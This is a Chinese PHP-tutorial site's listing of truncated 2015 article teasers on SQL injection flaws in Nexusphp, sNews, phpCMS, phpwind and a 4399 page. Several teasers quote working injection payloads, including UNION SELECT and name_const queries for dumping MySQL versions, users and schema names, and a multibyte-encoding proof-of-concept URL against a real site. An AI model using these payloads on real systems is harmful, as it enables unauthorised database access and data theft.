-
MYsql高级报错注入 - 网站安全 - 自学php
and (select count(*) from mysql.user)0/*1、查看MYsql版本and+exists(select*from+(select*from(select+name_const(@@version,0))a+join(select+name_const(@@version,0))b)c)2、爆所有库and(select 1 ......
栏目:网站安全 点击:56 日期:2015-04-17 -
Nexusphp v1.5 sql注射缺陷及修复 - 网站安全 - 自学
标题: Nexusphp.v1.5 sql injection Vulnerability作者: flyh4t www.2cto.com下载地址: http://sourceforge.net/projects/nexusphp/影响版本: nexusphp.v1.5测试平台: linux+apacheNexusphp is BitTo......
栏目:网站安全 点击:68 日期:2015-04-17 -
sNews sql注射缺陷及修复 - 网站安全 - 自学php
标题:sNews sql injection Vulnerabilities作者: Angel Injection www.2cto.com示例:http://www.2cto.com /[path]/index.php?id=8#39;http://www.2cto.com /path/index.php?id=-8+union+select+1,vers......
栏目:网站安全 点击:40 日期:2015-04-17 -
tsmim Lessons Library (show.php) sql注射缺陷及修复 - 网
===================================================================================tsmim lessons library sql injection Vulnerabilities=========================================================......
栏目:网站安全 点击:41 日期:2015-04-17 -
phpCMS V9 sys_auth()多个sql注入漏洞及修复 - 网站安全
by Flyh4tmail: phpsec#hotmail.com一 描叙:phpcms 使用sys_auth函数加解密cookie信息,系统中多个文件直接从cookie中获取变量进入程序流程。由于sys_auth函数在设计和使用过程中存在缺陷,导致注册用...
栏目:网站安全 点击:42 日期:2015-04-17 -
4399一处sql注射及修复 - 网站安全 - 自学php
简要描述:多字节编码问题引起的sql注入,导致数据库信息泄漏.详细说明:漏洞证明:http://news.4399.com/list/index.php?w=hs=l=x=a=%df%27 AND 1=2 UNION SELECT 1,2,3,4,TABLE_NAME,6,7,8,9,10,11,12......
栏目:网站安全 点击:37 日期:2015-04-17 -
phpcms v9 后台的一个(sql inj)2(code exec)漏洞 - 网站安
phpcms v9 后台的一个(sql inj)2(code exec)漏洞by flyh4t www.2cto.comphpcms v9 中 string2array()函数使用了eval函数,在多个地方可能造成代码执行漏洞function string2array($data) { if($data ......
栏目:网站安全 点击:52 日期:2015-04-17 -
phpcms 2008 sp4 comment.php页面sql注入漏洞分析 - 网站
发布作者:衰仔影响版本: phpcms 2008 sp4官方地址:www.phpcms.cn漏洞描述:问题出在/comment/include/comment.class.php中关于function ajaxupdate($field, $id)的定义:程序59行开始:function ajaxup......
栏目:网站安全 点击:42 日期:2015-04-17 -
phpWIND最新版本querybuilder.class.php页面sql注入漏洞及
简要描述:phpwind在实现占位符sql过程中,代码质量出现了一个小黑点。详细说明:在phpwind/lib/utility/querybuilder.class.php_parseStatement函数内在/phpwind/actions/ajax/leaveword.php的一个引用处Line .....
栏目:网站安全 点击:43 日期:2015-04-17 -
Mysql5+php注入查看MYsql基本信息(库名,版本,用户)
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*二.查数据库and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limi......
栏目:网站安全 点击:37 日期:2015-04-17